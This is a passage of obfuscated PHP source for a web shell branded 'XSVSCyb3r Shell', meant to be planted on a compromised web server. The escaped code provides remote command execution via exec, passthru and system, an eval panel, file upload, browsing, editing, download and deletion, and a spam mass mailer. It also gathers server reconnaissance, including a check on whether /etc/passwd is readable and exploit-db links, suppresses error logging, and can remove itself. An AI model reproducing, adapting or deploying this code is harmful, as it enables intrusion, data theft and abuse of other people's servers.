"\x3c\57\x74\144\76\x3c\164\x64\40\163\164\171\x6c\145\x3d\47\143\157\154\x6f\162\x3a\x72\x65\144\73\x27\76" . permissions($currentDirectory . "\x2f" . $File) . "\x3c\x2f\x74\x64\76\x3c\164\x64\76" . LastModified($currentDirectory . "\57" . $File) . "\74\57\164\x64\76\x3c\164\x64\x3e\x4e\x6f\164\x20\x41\x76\141\151\154\x69\142\154\145\x3c\x2f\164\144\x3e\74\x2f\x74\x72\x3e"; } else { echo "\x3c\x74\x72\76\74\164\x64\x3e\x3c\141\40\x63\x6c\141\163\163\75\x27\146\154\x69\x6e\x6b\47\40\164\x69\x74\154\145\75\x27\105\144\151\x74\x20\106\151\x6c\145\47\x20\150\162\x65\x66\x3d\47\x3f\162\x65\141\x64\146\151\154\145\x3d" . $currentDirectory . "\x2f" . $File . "\x27\76" . $File . "\x3c\x2f\141\x3e\x3c\x2f\x74\x64\x3e\x3c\164\x64\76\x3c\x63\145\156\x74\x65\x72\x3e" . $type . "\74\x2f\143\x65\156\164\145\x72\76\74\x2f\164\144\x3e\74\x74\x64\x20\143\154\x61\163\x73\75\47\146\x69\154\145\x73\151\x7a\x65\x27\x3e" . GetFileSize($currentDirectory . "\57" . $File) . "\74\57\x74\x64\x3e\74\164\x64\40\x73\164\171\154\145\75\x27\143\x6f\154\x6f\x72\72\162\x65\x64\73\x27\x3e" . permissions($currentDirectory . "\57" . $File) . "\74\x2f\164\x64\x3e\x3c\164\144\x3e" . LastModified($currentDirectory . "\57" . $File) . "\74\x2f\x74\144\76\74\164\x64\76\74\141\x20\x68\x72\x65\x66\75\x27\77\x72\x65\x61\144\x66\x69\x6c\x65\x3d" . $currentDirectory . "\57" . $File . "\x27\40\x74\151\164\x6c\145\75\47\105\x64\151\164\x20\106\151\154\x65\47\76\x45\74\x2f\141\76\x20\x2d\x20\74\141\x20\x68\162\x65\x66\x3d\47\x3f\x64\x65\154\x65\164\x65\75" . $currentDirectory . "\57" . $File . "\x27\x20\x74\x69\x74\x6c\145\75\x27\102\151\x6e\x20\164\150\145\40\x44\x6f\143\x75\x6d\145\156\x74\47\x3e\102\x3c\x2f\x61\x3e\x20\x2d\40\74\141\x20\x68\x72\x65\x66\75\47\x3f\x64\x6f\x77\x6e\154\146\151\154\145\x3d" . $currentDirectory . "\x2f" . $File . "\x26\x66\151\154\145\x3d" . $File . "\47\40\164\151\164\x6c\145\x3d\x27\104\x6f\x77\156\154\x6f\141\144\x20\x46\x69\154\145\x27\x3e\x44\74\x2f\x61\76\74\x2f\164\x64\76\74\x2f\164\x72\76"; } } } ?>
</table><div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0 0 10px 0;width:1000px"></div><div style="padding:10px;background-color:#292929;border:1px solid #3467ba;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;width:220px;float:left;margin:10px 10px 15px 0"><h4>File Upload</h4><form action=""method="post"enctype="multipart/form-data"><input name="file"type="file"><br><input name="upload"type="submit"value="Upload File"></form></div><?php  if (isset($_POST["\165\160\154\x6f\141\x64"])) { if (isset($_FILES["\146\151\154\x65"])) { move_uploaded_file($_FILES["\146\x69\x6c\145"]["\x74\x6d\160\137\x6e\141\x6d\x65"], $file_explorer . "\57" . $_FILES["\146\x69\x6c\x65"]["\x6e\141\155\x65"]); echo "\74\163\x63\x72\x69\x70\x74\x3e\141\154\145\162\x74\50\42\106\151\x6c\145\40\163\165\x63\x63\x65\x73\163\146\x75\154\x6c\x79\40\x75\160\x6c\x6f\x61\144\145\144\54\40\145\156\152\157\171\x2e\42\x29\73\74\x2f\x73\143\162\x69\x70\x74\x3e"; } } ?>
<div style="padding:10px;background-color:#292929;border:1px solid #3467ba;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;width:220px;float:left;margin:10px 10px 15px 0"><h4>Create Directory</h4><form action=""method="post"><input name="dirname"><br><input name="createdir"type="submit"value="Create Dir"></form></div><?php  if (isset($_POST["\143\162\145\141\x74\x65\144\151\162"])) { if (strlen($_POST["\144\151\162\x6e\x61\155\x65"]) > 0) { mkdir($file_explorer . "\x2f" . $_POST["\144\x69\162\x6e\141\x6d\x65"], 777) or die($file_explorer . "\x2f" . $_POST["\144\151\162\x6e\141\155\145"]); } } ?>
<br><br><br><?php  } elseif (strstr($CurrentUrl, "\144\x6f\x77\x6e\x6c\x66\x69\x6c\x65")) { $file = $_GET["\146\151\154\145"]; forceDL($currentDirectoryFileDl, $file); function forceDL($filePath, $fileName) { if (ini_get("\172\154\151\x62\56\157\165\x74\x70\x75\x74\x5f\143\x6f\155\x70\162\145\x73\x73\151\x6f\x6e")) { ini_set("\172\154\151\x62\56\157\165\164\160\165\164\x5f\143\x6f\x6d\x70\162\145\163\163\151\157\156", "\117\146\146"); } header("\120\x72\x61\147\155\141\72\x20\160\165\x62\154\x69\143"); header("\x45\x78\160\x69\162\145\163\x3a\x20\x30"); header("\x43\141\143\150\x65\x2d\103\x6f\156\x74\x72\157\x6c\72\40\x6d\165\163\164\55\162\145\x76\x61\154\151\144\x61\164\x65\54\x20\x70\157\x73\x74\x2d\x63\x68\145\143\x6b\75\x30\x2c\x20\160\162\145\x2d\143\x68\x65\x63\x6b\75\60"); header("\x4c\x61\x73\164\x2d\115\157\x64\151\x66\151\145\x64\72\40" . gmdate("\x44\54\x20\144\40\115\x20\131\x20\110\x3a\x69\x3a\x73", filemtime($filePath)) . "\40\x47\115\124"); header("\x43\x61\143\x68\x65\55\103\157\156\164\x72\x6f\x6c\x3a\40\160\162\151\166\x61\x74\x65", false); header("\103\x6f\156\164\145\x6e\x74\x2d\x54\171\160\145\x3a\x20\x61\x70\160\x6c\x69\143\141\164\151\157\156\57\146\157\x72\143\x65\55\144\x6f\167\156\x6c\x6f\x61\144"); header("\x43\157\156\x74\145\x6e\164\x2d\x64\151\163\160\x6f\163\151\164\x69\x6f\x6e\72\40\141\164\164\x61\x63\150\x6d\x65\156\x74\x3b\x20\146\151\154\145\x6e\141\x6d\x65\75\42" . $fileName . "\x22"); header("\103\157\x6e\164\x65\156\164\55\124\162\x61\156\163\x66\x65\162\x2d\x45\156\143\157\x64\151\x6e\x67\72\40\x62\x69\x6e\141\162\x79"); header("\103\x6f\156\x74\x65\156\164\55\x6c\145\156\147\164\150\72\40" . filesize($filePath)); readfile($filePath); echo $filePath . $fileName; die; } } elseif (strstr($CurrentUrl, "\x6b\165\x65\161\171\x6d\x61\163\x73")) { get_srv_info(); ?>
<strong>Mass Mailer</strong><p>Be warned using the mass mailing feature may attract attention to your XSVSCyb3r Shell. Seperate each email with <strong>;</strong></p><form action=""method="post"><table><tr><td>To Email(s) :</td><td><input name="email"style="background-color:#010101;color:#f2f2f2;border:1px solid #3467ba;outline:0;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px"placeholder="xsvs@xsvscyb3r.id"></tr><tr><td>Subject :</td><td><input name="subject"style="background-color:#010101;color:#f2f2f2;border:1px solid #3467ba;outline:0;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px"></td></tr><tr><td>From Email :</td><td><input name="fromEmail"type="email"style="background-color:#010101;color:#f2f2f2;border:1px solid #3467ba;outline:0;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px"placeholder="xsvs@xsvscyb3r.id"></td></tr><tr><td>Message :</td><td></td></tr></table><table><tr><td><textarea name="message"style="background-color:#010101;color:#f2f2f2;border:1px solid #3467ba;outline:0;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;height:200px;width:290px"></textarea></td></tr><tr><td><input name="send"type="submit"value="Send Message(s)"></td></tr></table></form><?php  if (isset($_POST["\x73\x65\x6e\144"])) { $email = $_POST["\x65\155\141\x69\x6c"]; $subject = $_POST["\163\x75\142\x6a\145\x63\x74"]; $from = $_POST["\146\162\157\155\105\155\x61\151\x6c"]; $message = $_POST["\x6d\145\x73\x73\x61\147\x65"]; if ($email && $subject && $from && $message) { $emails = explode("\73", $email); foreach ($emails as $email) { mail($email, $subject, $message, "\x46\162\157\155\72\40" . $from); } } } } elseif (strstr($CurrentUrl, "\144\x65\x6c\145\164\x65")) { if (!is_dir($delete)) { unlink($delete); } else { rmdir($delete); } header("\x4c\157\x63\141\164\x69\157\156\72\x20" . $_SERVER["\x48\124\124\120\137\x52\x45\106\105\122\x45\x52"]); } elseif (strstr($CurrentUrl, "\143\x33\112\62\x61\127\x35\x6d\142\167")) { get_srv_info(); $s_safemode = ini_get("\x73\141\146\x65\137\x6d\157\x64\x65"); if ($s_safemode = TRUE) { $s_safemode = "\x3c\x73\x70\141\x6e\x20\143\x6c\141\x73\x73\75\x27\x65\156\141\x62\154\x65\x64\x27\76\133\x4f\x4e"; } else { $s_safemode = "\x3c\163\x70\141\156\40\x63\154\x61\163\163\x3d\47\x64\x69\x73\x61\142\154\145\x64\x27\x3e\133\117\106\106"; } if (extension_loaded("\143\165\x72\x6c")) { $curls = "\74\x73\x70\141\x6e\x20\143\x6c\141\163\x73\75\47\x65\x6e\x61\x62\154\145\x64\47\76\133\117\x4e\135\74\x2f\x73\x70\x61\156\x3e"; } else { $curls = "\74\x73\160\x61\x6e\40\143\154\141\x73\x73\x3d\47\x64\151\x73\x61\x62\x6c\145\x64\x27\76\133\117\106\x46\x5d\74\x2f\x73\x70\x61\x6e\x3e"; } echo "\74\142\76\x53\145\x72\x76\x65\x72\40\120\x6f\x72\x74\x20\72\40\74\x2f\142\76" . $_SERVER["\x53\x45\x52\x56\x45\122\x5f\120\117\122\124"] . "\x3c\x62\162\x20\x2f\x3e\74\142\162\x20\57\76\74\142\x3e\110\x54\124\x50\x20\x43\x6f\x6e\x6e\145\x63\164\x69\x6f\x6e\40\x3a\40\74\x2f\x62\x3e" . $_SERVER["\x48\x54\x54\x50\x5f\103\x4f\116\116\x45\103\x54\x49\117\116"] . "\74\x62\x72\x20\57\x3e\74\x62\x72\40\x2f\x3e\74\x62\76\x4f\x70\x65\x72\141\x74\x69\x6e\x67\40\x53\171\x73\164\145\155\40\x3a\74\x2f\142\x3e\40" . php_uname() . "\74\x62\162\40\x2f\76\x3c\x62\x72\x20\x2f\76"; if (get_magic_quotes_gpc()) { echo "\x3c\142\76\115\x61\147\x69\143\40\x51\165\157\164\x65\x73\x20\x3a\x3c\57\x62\x3e\40\74\163\x70\x61\x6e\40\x63\154\x61\163\163\x3d\47\x65\x6e\x61\142\154\x65\144\x27\76\x5b\x45\x4e\101\x42\x4c\x45\104\135\74\x2f\x73\160\x61\156\x3e\74\142\162\x20\x2f\x3e\74\142\x72\x20\57\76"; } else { echo "\74\142\76\x4d\141\x67\x69\x63\x20\121\x75\157\164\145\x73\x20\72\x3c\x2f\142\76\40\74\x73\160\x61\x6e\40\x63\x6c\141\163\x73\x3d\x27\x64\151\x73\141\x62\x6c\145\x64\47\x3e\x5b\104\111\x53\101\102\114\105\104\x5d\74\x2f\x73\160\141\x6e\x3e\74\x62\x72\40\57\x3e\74\x62\162\40\57\76"; } echo "\74\x62\x3e\x50\x48\120\40\x56\145\x72\163\151\157\156\x20\x3a\74\x2f\142\x3e\40" . phpversion() . "\x3c\142\x72\x20\57\x3e\74\142\x72\x20\57\76\x3c\x62\76\123\141\x66\x65\40\115\157\x64\x65\40\x3a\x20\x3c\x2f\x62\76" . $s_safemode . "\x5d\74\x2f\163\160\x61\x6e\76\x3c\x62\x72\40\x2f\76\x3c\x62\x72\40\x2f\x3e\x3c\x62\x3e\103\165\162\154\x3a\x20\74\57\142\76" . $curls . "\74\142\x72\x20\57\76\74\x62\x72\40\57\x3e\74\142\x3e\x41\143\143\x65\160\164\x20\105\156\x63\x6f\x64\x69\x6e\x67\40\72\x20\74\57\142\76\x20" . $_SERVER["\x48\x54\124\x50\137\101\x43\x43\x45\120\124\x5f\105\x4e\103\x4f\104\x49\x4e\x47"] . "\74\142\162\40\x2f\x3e\74\142\x72\40\57\76\74\142\76\101\144\x6d\x69\x6e\x20\72\40\x3c\57\142\x3e" . $_SERVER["\x53\x45\122\x56\x45\x52\x5f\101\x44\115\x49\x4e"] . "\x3c\142\x72\x20\57\76\x3c\142\162\x20\x2f\76\x3c\163\164\x72\x6f\156\147\x3e\x44\x69\163\x61\x62\154\x65\x64\x20\106\165\x6e\143\164\x69\x6f\x6e\163\40\72\40\x3c\x2f\163\164\x72\157\156\x67\x3e"; if (!empty($disabled)) { foreach ($disabled as $functionsdis) { echo $functionsdis . "\54\40"; } } else { echo "\x6e\157\x6e\x65"; } echo "\x3c\x62\x72\x20\57\x3e\74\x62\162\40\57\x3e\74\x73\x74\162\x6f\x6e\x67\x3e\x2f\145\x74\143\x2f\x70\141\163\x73\x77\144\x3a\x20\74\x2f\x73\x74\x72\157\x6e\147\76"; if (is_readable("\x2f\x68\157\x6d\145\x2f\145\164\143\57\160\141\x73\163\x77\x64")) { echo "\74\163\x70\x61\156\40\x73\164\x79\x6c\145\75\x27\x63\x6f\x6c\157\x72\x3a\147\x72\145\x65\x6e\73\47\x3e\122\145\x61\144\141\142\154\x65\74\57\x73\160\141\x6e\x3e"; } else { echo "\74\x73\160\141\x6e\40\163\164\171\154\145\75\47\143\157\154\157\162\72\x72\145\144\x3b\x27\x3e\x55\156\162\x65\141\144\x61\x62\x6c\x65\x3c\x2f\163\160\141\x6e\x3e"; } } elseif (strstr($CurrentUrl, "\x64\107\x56\171\142\x57\154\150\142\x6d\167")) { get_srv_info(); ?>
<p>Command line execution via exec, passthru or system.</p><form action=""method="post"><table><tr><td><b>Command Execution :</b></td><td><input name="command"placeholder="root:~# "autocomplete="off"class="command"></td></tr></table><?php  $out = array(); if (cmd() == "\x65\170\145\143") { echo "\x55\163\151\156\147\x3a\40\x65\170\145\143\x20\75\76\x20"; exec($_POST["\x63\x6f\x6d\x6d\141\156\144"], $out); foreach ($out as $line) { echo "{$line}\xa"; } } elseif (cmd() == "\x70\141\x73\163\164\x68\x72\165") { echo "\125\x73\151\x6e\x67\72\40\160\x61\x73\163\164\150\162\x75\40\x3d\76\40"; passthru($_POST["\143\157\x6d\155\x61\x6e\x64"], $out); foreach ($out as $line) { echo "{$line}\12"; } } elseif (cmd() == "\163\171\x73\164\x65\x6d") { echo "\125\x73\151\156\x67\72\x20\x73\x79\163\164\x65\x6d\40\x3d\x3e\40"; system($_POST["\x63\157\155\155\x61\156\144"], $out); foreach ($out as $line) { echo "{$line}\xa"; } } } elseif (strstr($CurrentUrl, "\x61\62\x35\63\141\130\x4e\61\x5a\121")) { get_srv_info(); echo "\12\x9\11\74\150\x34\x3e\111\x6e\x66\157\162\x6d\x61\164\151\157\x6e\x3c\x2f\x68\64\76\12\x9\11\x3c\x70\76\130\123\126\123\x43\x79\x62\x33\162\40\x53\150\145\x6c\x6c\x20\166" . $shellVersion . "\40\x4f\160\145\156\x20\102\145\164\x61\40\105\144\x69\164\x69\x6f\156\x20\55\x20\143\x6f\144\145\x64\40\x62\x79\40\130\x53\x56\123\103\x79\142\x33\162\x20\142\x65\154\x6f\x77\40\141\x72\145\40\164\x68\145\x20\153\x6e\157\167\x6e\40\151\x73\163\x75\145\x73\x20\141\x6e\x64\x20\x62\x75\x67\163\56\x3c\x2f\x70\76"; ?>
<ul><li>is_dir function not returning correct result within child dirs of the file browser.</li><li>File Browser controls, e.g. rename, create file, delete full dir.</li><li>Editing can run into trouble with GET Method Not Implemented error.</li></ul><br><br><?php  } elseif (strstr($CurrentUrl, "\x3f\145\x76\141\154")) { get_srv_info(); ?>
<div style="float:left;width:700px"><h4>Eval (PHP code execution)</h4><form action=""method="post"><textarea name="phpeval"style="width:700px;height:190px;padding:5px;background:#ccc">//Example, get all PHP info about the server echo phpinfo();</textarea><br><input name="evalexecute"type="submit"value="Execute Code"style="padding:4px 10px;margin:10px 0"></form></div><div style="float:right;width:250px"><h4>Information</h4><p>Enter your specified php code within the textarea and wait for the response.</p><p><strong>Example : </strong><i>echo phpinfo();</i></p><br><br><h4>Warning</h4><p>including external files with seperate stylesheets may affect the apearence of G6 styles.</p></div><?php  if (isset($_POST["\x65\x76\x61\154\145\x78\145\143\165\164\145"])) { } } elseif (strstr($CurrentUrl, "\77\x73\x72\155\x76\145")) { get_srv_info(); ?>
<p>If you are sure you wish to remove the shell click the button below, make sure you are certain as you wil only have one shot at this.</p><form action=""method="post"><center><input name="Remove"type="submit"value="Remove Shell"style="padding:7px 15px;margin:10px 0"></center></form><?php  if (isset($_POST["\x52\145\155\x6f\166\145"])) { if (file_exists(__FILE__)) { unlink(__FILE__); } } } else { get_srv_info(); ?>
<br><br><br><br><div class="Logo">XSVSCyb3r v<?php  echo $shellVersion; ?>
</div><div class="logotext">XSVSCyb3r Shell Coded By XSVSCyb3r</div><br><br><br><?php  } goto CkY10; JvkQY: ob_start(); goto DbQwI; adRGF: function cmd() { $disabled = explode("\54\40", ini_get("\144\x69\163\x61\142\x6c\145\137\146\165\156\x63\x74\151\x6f\x6e\163")); $diabledLower = array(); foreach ($diabled as $function) { $diabledLower[] = strtolower($function); } if (!in_array($diabledLower, "\x65\170\x65\x63")) { return "\145\x78\x65\x63"; } elseif (!in_array($diabledLower, "\x70\x61\x73\x73\x74\x68\162\x75")) { return "\160\141\x73\163\x74\x68\162\x75"; } elseif (!in_array($diabledLower, "\x73\171\163\x74\145\155")) { return "\x73\171\163\164\x65\155"; } else { return "\156\x6f\156\x65"; } } goto ygZcf; MOEGi: @ini_set("\155\x61\x78\x5f\x65\x78\145\143\165\164\x69\157\156\x5f\x74\x69\155\x65", 0); goto Ldehk; i67pB: function get_srv_info() { echo "\74\142\162\x20\57\x3e\74\163\x70\x61\156\x20\151\144\75\47\164\151\x74\x6c\145\47\76\130\x53\x56\123\x43\x79\x62\x33\x72\x20\x53\x68\x65\x6c\154\x3c\57\163\160\141\156\x3e\x3c\142\x72\x20\57\x3e\74\x64\151\x76\x20\143\x6c\141\163\163\75\x27\x62\x6f\170\x27\76\x3c\x62\x3e\123\x65\x72\166\145\162\x20\116\x61\155\x65\40\72\x20\x3c\57\x62\x3e" . $_SERVER["\123\x45\122\x56\x45\x52\x5f\116\101\x4d\105"] . "\x3c\x62\162\x20\57\76\12\11\x3c\142\x3e\x53\x65\x72\x76\x65\162\x20\111\120\x20\72\40\x3c\x2f\142\x3e" . $_SERVER["\123\x45\122\x56\105\x52\137\101\104\x44\122"] . "\40\x3c\163\160\141\x6e\x20\143\154\141\x73\x73\x3d\x27\145\156\141\142\154\x65\x64\x27\x3e\74\x61\x20\150\162\x65\x66\x3d\x27\x68\164\164\160\x3a\57\x2f\167\x77\167\56\167\x68\x6f\56\151\163\57\167\150\157\151\163\57" . $_SERVER["\x48\124\x54\x50\x5f\110\x4f\x53\x54"] . "\47\40\x74\x61\162\147\x65\x74\75\47\x5f\x62\154\x61\x6e\153\x27\76\133\127\x48\x4f\111\123\x5d\x3c\x2f\141\x3e\40\55\40\x3c\x61\x20\150\x72\145\x66\75\x27\x68\164\164\160\x3a\57\x2f\x77\167\167\56\144\156\x73\163\164\165\146\x66\56\143\x6f\155\x2f\x74\157\x6f\x6c\163\x3f\x72\165\x6e\106\x72\x6f\x6d\x4d\141\x69\x6e\75" . $_SERVER["\123\105\122\x56\105\x52\x5f\x41\104\104\x52"] . "\46\x74\x6f\x6f\x6c\x54\171\x70\x65\75\x74\162\x61\143\x65\162\x6f\x75\164\x65\47\40\x74\x61\x72\x67\145\164\75\x27\x5f\x62\154\x61\156\x6b\x27\76\x5b\124\x52\101\103\x45\122\x4f\125\124\x45\x5d\x3c\x2f\141\x3e\74\57\x73\x70\x61\x6e\76\74\x62\x72\x20\x2f\76" . "\x3c\142\x3e\123\x68\x65\x6c\154\x20\114\x6f\143\141\x74\151\157\156\40\x3a\40\x3c\57\x62\76" . $_SERVER["\x53\x43\x52\x49\x50\x54\x5f\106\111\114\x45\116\101\x4d\x45"] . "\x3c\142\x72\40\x2f\76\xa\x9\x3c\x62\x3e\123\145\162\x76\x65\x72\40\x53\157\x66\x74\x77\141\x72\145\40\x3a\x20\74\57\x62\x3e" . $_SERVER["\x53\x45\122\126\x45\x52\137\x53\117\106\x54\x57\x41\122\x45"] . "\40\74\163\160\x61\156\40\143\x6c\141\163\163\75\47\x65\x6e\141\142\154\145\x64\47\x3e\74\141\40\x68\162\x65\x66\x3d\x27\150\x74\164\x70\72\x2f\x2f\x77\x77\x77\56\x65\x78\160\x6c\157\x69\164\x2d\x64\142\56\143\157\155\57\163\145\141\x72\x63\x68\57\x3f\141\x63\164\151\157\156\x3d\x73\x65\x61\x72\143\150\x26\146\151\154\164\145\162\137\160\x61\147\145\x3d\61\46\x66\151\x6c\164\145\x72\x5f\x64\145\163\x63\x72\x69\160\x74\x69\157\x6e\75" . $_SERVER["\x53\x45\122\126\x45\122\137\123\117\x46\x54\x57\101\x52\x45"] . "\46\146\151\154\x74\145\162\137\145\170\160\x6c\x6f\x69\164\137\164\145\x78\x74\x3d\46\x66\x69\154\x74\145\x72\137\141\165\x74\150\x6f\x72\75\46\x66\151\x6c\164\x65\162\x5f\160\x6c\x61\x74\x66\157\x72\155\75\60\x26\146\x69\154\164\x65\x72\137\x74\171\160\145\75\x30\x26\146\x69\x6c\164\x65\x72\137\x6c\x61\x6e\x67\137\151\x64\75\60\x26\x66\151\x6c\x74\145\x72\x5f\x70\x6f\162\164\75\x26\x66\x69\154\164\145\x72\137\x6f\163\166\144\x62\75\46\x66\151\154\x74\145\x72\137\x63\166\145\75\47\40\164\x61\162\x67\x65\x74\75\x27\137\142\x6c\141\x6e\153\47\x3e\133\105\170\x70\x6c\x6f\x69\164\x20\104\x42\135\74\x2f\141\76\74\x2f\x73\160\x61\x6e\x3e\x3c\142\x72\x20\x2f\x3e\12\11\74\57\144\151\x76\76\74\142\x72\x20\57\x3e\74\x62\x72\40\57\76\74\160\x3e\74\57\160\76"; } goto adRGF; DRYjJ: $mkdir = $_GET["\x62\127\164\x6b\141\x58\x49"]; goto VRkPB; Ldehk: echo "\74\x74\x69\164\154\x65\x3e\x2e\72\x3a\40\130\x53\126\123\103\x79\142\x33\162\40\123\x68\x65\x6c\x6c\x20\x3a\72\x2e\x3c\57\x74\x69\x74\x6c\145\x3e"; goto i67pB; DbQwI: ini_set("\x64\151\x73\160\x6c\x61\x79\137\145\x72\162\157\162\163", false); goto Zu_Z3; CkY10: ob_flush(); goto sN4Kf; o_xj8: @ini_set("\145\x72\162\157\162\137\154\x6f\x67", NULL); goto up3zz; VRkPB: $currentDirectoryFileDl = $_GET["\x64\157\x77\x6e\154\x66\151\x6c\145"]; goto qXnzg; p0SJE: $CurrentUrl = "\150\164\x74\x70\x3a\57\57" . $_SERVER["\x48\x54\x54\120\x5f\x48\117\x53\x54"] . $_SERVER["\x52\x45\x51\125\x45\123\124\x5f\125\122\x49"]; goto QiDWg; ANKt2: $downloadfilename = $_GET["\x5a\107\71\63\x62\147"]; goto CphMa; sN4Kf: ?>
<body></html>